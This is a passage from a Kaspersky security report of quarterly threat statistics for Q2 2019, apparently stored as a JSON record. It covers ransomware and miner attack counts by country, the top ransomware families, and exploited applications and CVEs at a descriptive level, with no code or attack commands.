Trojans\n\nIn Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)\n\nThe busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. 
However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by ransomware**** \n---|---|--- \n1 | Bangladesh | 8.81% \n2 | Uzbekistan | 5.52% \n3 | Mozambique | 4.15% \n4 | Ethiopia | 2.42% \n5 | Nepal | 2.26% \n6 | Afghanistan | 1.50% \n7 | China | 1.18% \n8 | Ghana | 1.17% \n9 | Korea | 1.07% \n10 | Kazakhstan | 1.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32.PolyRansom | 2.45% | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky products. 
The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.\n\n_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)\n\nThe largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)\n\nThroughout the quarter, the number of attacked users gradually decreased \u2013 from 383,000 in April to 318,000 in June.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)\n\n**Top 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 10.77% \n2 | Ethiopia | 8.99% \n3 | Uzbekistan | 6.83% \n4 | Kazakhstan | 4.76% \n5 | Tanzania | 4.66% \n6 | Vietnam | 4.28% \n7 | Mozambique | 3.97% \n8 | Ukraine | 3.08% \n9 | Belarus | 3.06% \n10 | Mongolia | 3.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique 
users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nOver the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception \u2013 the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. These vulnerabilities are stack overflows caused by bugs in object processing in the Equation Editor component of Microsoft Office, and they allow remote code execution. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.\n\nThe increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. 
In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)\n\nThe share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>) and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), for remote code execution in Mozilla Firefox.\n\nOn the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. 
The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).\n\nThe share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were quick to put new vulnerabilities in network applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>) to use. The ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server also deserve a separate mention. However, the greatest danger for many users came from the [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and to create a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient validation of incoming packets allows an attacker to trigger a use-after-free condition and overwrite data in kernel memory. 
Note that exploitation does not require valid account credentials, as it takes place at the authentication stage, before the username and password are checked.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n#### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US. 
Overall, the Top 4 remained unchanged from the previous quarter.\n\n#### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 20.38 \n2 | Venezuela | 19.13 \n3 | Albania | 18.30 \n4 | Greece | 17.36 \n5 | Moldova | 17.30 \n6 | Bangladesh | 16.82 \n7 | Estonia | 16.68 \n8 | Azerbaijan | 16.59 \n9 | Belarus | 16.46 \n10 | Ukraine | 16.18 \n11 | France | 15.84 \n12 | Philippines | 15.46 \n13 | Armenia | 15.40 \n14 | Tunisia | 15.29 \n15 | Bulgaria | 14.73 \n16 | Poland | 14.69 \n17 | R\u00e9union | 14.68 \n18 | Latvia | 14.65 \n19 | Peru | 14.50 \n20 | Qatar | 14.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.\n\n_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)\n\n### Local threats\n\n_Statistics on local 
infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.\n\n#### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 55.43 \n2 | Tajikistan | 55.27 \n3 | Uzbekistan | 55.03 \n4 | Yemen | 52.12 \n5 | Turkmenistan | 50.75 \n6 | Laos | 46.12 \n7 | Syria | 46.00 \n8 | Myanmar | 45.61 \n9 | Mongolia | 45.59 \n10 | Ethiopia | 44.95 \n11 | Bangladesh | 44.11 \n12 | Iraq | 43.79 \n13 | China | 43.60 \n14 | Bolivia | 43.47 \n15 | Vietnam | 43.22 \n16 | Venezuela | 42.71 \n17 | Algeria | 42.33 \n18 | Cuba | 42.31 \n19 | Mozambique | 42.14 \n20 | Rwanda | 42.02 \n \n_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. 
The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)\n\nOverall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.\n\nThe figure for Russia was 26.14%.", "modified": "2019-08-19T10:00:00", "published": "2019-08-19T10:00:00", "id": "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "href": "https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/", "type": "securelist", "title": "IT threat evolution Q2 2019. Statistics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}